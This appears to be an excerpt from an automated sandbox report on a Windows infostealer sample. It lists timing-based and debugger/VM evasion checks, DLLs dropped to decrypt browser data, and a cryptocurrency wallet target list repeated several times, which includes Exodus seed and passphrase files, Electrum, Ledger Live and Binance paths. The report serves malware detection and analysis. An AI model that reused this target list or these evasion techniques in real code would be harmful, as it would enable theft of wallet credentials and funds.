Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0AFC second address: 4DB0B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0B00 second address: 4DB0B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a call 00007FCB4545A1B2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0B1E second address: 4DB0B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCB44FB4556h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0B40 second address: 4DB0B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0B46 second address: 4DB0B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB454Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, B58Eh 0x00000013 mov si, dx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0B65 second address: 4DB05B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0008h 0x0000000c cmp dword ptr [ebp-2Ch], 10h 0x00000010 mov eax, dword ptr [ebp-40h] 0x00000013 jnc 00007FCB4545A1A5h 0x00000015 push eax 0x00000016 lea edx, dword ptr [ebp-00000590h] 0x0000001c push edx 0x0000001d call esi 0x0000001f push 00000008h 0x00000021 jmp 00007FCB4545A1B0h 0x00000026 call 00007FCB4545A1A9h 0x0000002b jmp 00007FCB4545A1B0h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0C61 second address: 4DB0C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0C65 second address: 4DB0C6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0C6B second address: 4DB0C81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB454Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0C81 second address: 4DB0C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0C85 second address: 4DB0C8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0C8B second address: 4DB0C91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Special instruction interceptor: First address: 11FF8FA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Special instruction interceptor: First address: 11FF9BA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Special instruction interceptor: First address: 13A142D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Special instruction interceptor: First address: 13B2C96 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Special instruction interceptor: First address: 1434F5B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\zUKf62kgkm.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C46C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C46C930
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: zUKf62kgkm.exe, zUKf62kgkm.exe, 00000000.00000002.2092066472.0000000001383000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000906000.00000004.00000020.00020000.00000000.sdmp, zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.00000000008BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: zUKf62kgkm.exe, 00000000.00000002.2092066472.0000000001383000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\zUKf62kgkm.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: NTICE
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: SICE
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: SIWVID
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C4B5FF0
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4BC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C4BC410
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C48B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C48B66C
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C48B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C48B1F7
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: zUKf62kgkm.exe PID: 7116, type: MEMORYSTR
Source: zUKf62kgkm.exe, zUKf62kgkm.exe, 00000000.00000002.2092066472.0000000001383000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: qProgram Manager
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C48B341 cpuid 0_2_6C48B341
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C4535A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C4535A0

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000000.00000002.2091797382.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1809616289.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2091194636.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: zUKf62kgkm.exe PID: 7116, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: zUKf62kgkm.exe PID: 7116, type: MEMORYSTR
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*.*
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\ElectronCash\wallets\\*.*M
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.0000000001117000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Liberty
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json=
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\exodus.conf.json
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\exodus.conf.json
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco0
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\exodus.conf.json
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp-
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron 